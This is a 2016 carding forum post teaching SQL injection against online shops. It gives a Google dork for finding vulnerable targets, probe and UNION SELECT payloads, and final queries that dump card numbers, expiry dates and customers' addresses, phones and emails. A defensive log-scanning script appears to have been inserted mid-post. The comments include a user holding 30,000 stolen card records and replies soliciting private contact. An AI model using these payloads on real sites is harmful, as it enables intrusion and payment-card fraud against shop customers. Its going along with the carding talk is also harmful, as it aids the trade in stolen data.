
(CC Hacking)New SQL Injection Tutorials 2016

SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). This is a new tutorial by me for hacking CC.

1) we got to search google for webshops , I used this dork :


Code:
inurl:customer_testimonials.php testimonial_id=


2)lets say we got this site 



Code:
http://www.JustExample.com/customer_...stimonial_id=7


3) we got to check if its vulnerable to SQLi , we add this 

Code:
'
to url :

>>>


Code:
http://www.JustExample.com/customer_...stimonial_id=7'


If we get an error, it means the website is vulnerable.

4) we have to check for column number we try with 10 first 


Code:
+order+by+10-
- :

>>>



Code:
http://www.JustExample.com/customer_...+order+by+10--



If we don't get an error, the website has more than 10 columns; if we get an error, the website has fewer than 10 columns.

5 )this time we get a error now we try from 1 to 9 


Code:
+union+select+1,2,3,4,5,6,7,8,9--


>>>


Code:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--


now we found it the website has 9 columns

6) most of time we can get infos from table 3 and 6 , lets say now we can from 3 xD , now we can get database user , database name and database version in this way :

*- database user


Code:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--


*- database name


Code:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--


*- database version


Code:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--


7) we need the table names we add this to url :


Code:
+union+select+1,2,table_name,4,5,6,7,8,9+from+info rmation_schema.tables--




Code:
http://www.JustExample.com/customer_...chema.tables--


now we need columns : we add this to url :

Code:
+union+select+1,2,concat(table_name,char(58),colum n_name),4,5,6,7,8,9+from+information_schema.column s--


>>>

Code:
http://www.JustExample.com/customer_...hema.columns--
9) now all we got to do is view the orders and customers infos (there are the credit cards xD) : if we add this to url we will get credit card numbers , payment method , credit card type ......


Code:
+union+select+1,2,concat(payment_method,char(58),c c_type,char(58),cc_number,char(58),cc_expires),4,5 ,6,7,8,9fromorders--


>>>


Code:
http://www.JustExample.com/customer_...+from+orders--


if we add this to url we will get many infos about costumers , address , phone number , e-mails , zip code , and the credit card infos all of them


Code:
+union+select+1,2,concat(orders_id,0x2F,cc_type,0x 2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,cu stomers_street_address,0x2F,customers_suburb,0x2F, customers_city,0x2F,customers_postcode,0x2F,custom ers_state,0x2F,customers_country,0x2F,customers_te lephone,0x2F,customers_email_address,0x2F,date_pur chased),4,5,6,7,8,9+from+orders+


>>>


Code:
/customer_testimonials.php?&testimonial_id=7+union+ select+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_o wner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers _street_address,0x2F,customers_suburb,0x2F,custome rs_city,0x2F,customers_postcode,0x2F,customers_sta te,0x2F,customers_country,0x2F,customers_telephone ,0x2F,customers_email_address,0x2F,date_purchased) ,4,5,6,7,8,9+from+orders+


now one step left

10 ) get the credit cards and have fun....

Don't forget to use your brain......

ENJOY !!!!
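
Seen from the defender's side, every stage above leaves a recognizable value in `testimonial_id` in the web server access log. The following is an added example, not code from the original post: it scans constructed log lines for that parameter and labels any value that is not a plain integer. The log lines, IP addresses, stage labels and function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IP ranges); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2016:10:00:01 +0000] "GET /customer_testimonials.php?testimonial_id=7 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2016:10:00:05 +0000] "GET /customer_testimonials.php?testimonial_id=7' HTTP/1.1" 500 312
203.0.113.9 - - [01/Jan/2016:10:00:09 +0000] "GET /customer_testimonials.php?testimonial_id=7+order+by+10-- HTTP/1.1" 500 312
203.0.113.9 - - [01/Jan/2016:10:00:14 +0000] "GET /customer_testimonials.php?&testimonial_id=7+UNION+SELECT+1,2,table_name,4+from+information_schema.tables-- HTTP/1.1" 200 9001
198.51.100.2 - - [01/Jan/2016:10:01:00 +0000] "GET /customer_testimonials.php?testimonial_id=%37%27 HTTP/1.1" 500 312
"""

LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
STAGES = [  # checked in order, latest stage of the tutorial first
    ("schema-enumeration", re.compile(r"information_schema", re.I)),
    ("union-extraction", re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)),
    ("column-count-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("quote-probe", re.compile(r"['\"]")),
]

def is_valid_id(value):
    """Rule the application should enforce server-side: decimal digits only."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None

def classify(value):
    if is_valid_id(value):
        return None
    for name, rx in STAGES:
        if rx.search(value):
            return name
    return "non-numeric"

def scan(log_text, param="testimonial_id"):
    """Return (client_ip, stage, http_status) for every suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        values = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in values.get(param, []):  # parse_qs already URL-decodes
            stage = classify(value)
            if stage:
                findings.append((ip, stage, int(status)))
    return findings
```

The same `is_valid_id` rule, enforced in the application before the value reaches a query built with bound parameters, rejects every request in the tutorial. A finding whose status is 200 rather than 500 deserves priority, since the injected query ran without error.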

5 comments:

  1. hi im looking for somehelp here, i got 30k cc details but only the card number was in code like this !~!1 for them all so do i need that and if so is there anyway to crack the code? i have another list with everything except the cvv number, same again its in code. on both i have all these details - BillName, BillStreet, BillStreet2, BillCity, BillState, BillZip, BillPhone, BillEmail, CardType, CardNumLastFour, CardExpMonth, CardExpYear, CardCvv. but as i said the first one is missing thecard number and the other one is missing cvv number, so do i need those or can i do anything with them as it is? thanks for your help in advance.

  2. If you need help for this problem contact me at this address thehacker.city01@gmail.com

  3. If you need help for this problem contact me at this address thehacker.city01@gmail.com

  4. I am hving the same issues like him is it ok with you if i contect you through email as well

  5. You have been thee onky one that i red that even tryed or replted back to any ?s even in the 2 carding forums i signed up for they were pretty much dicks flashing tje bling blingnbut thats it abd am really enjoying this whole thing but am in the verhe of giving up if you can kool 305bornandrasied @ the g.mbox thx brother
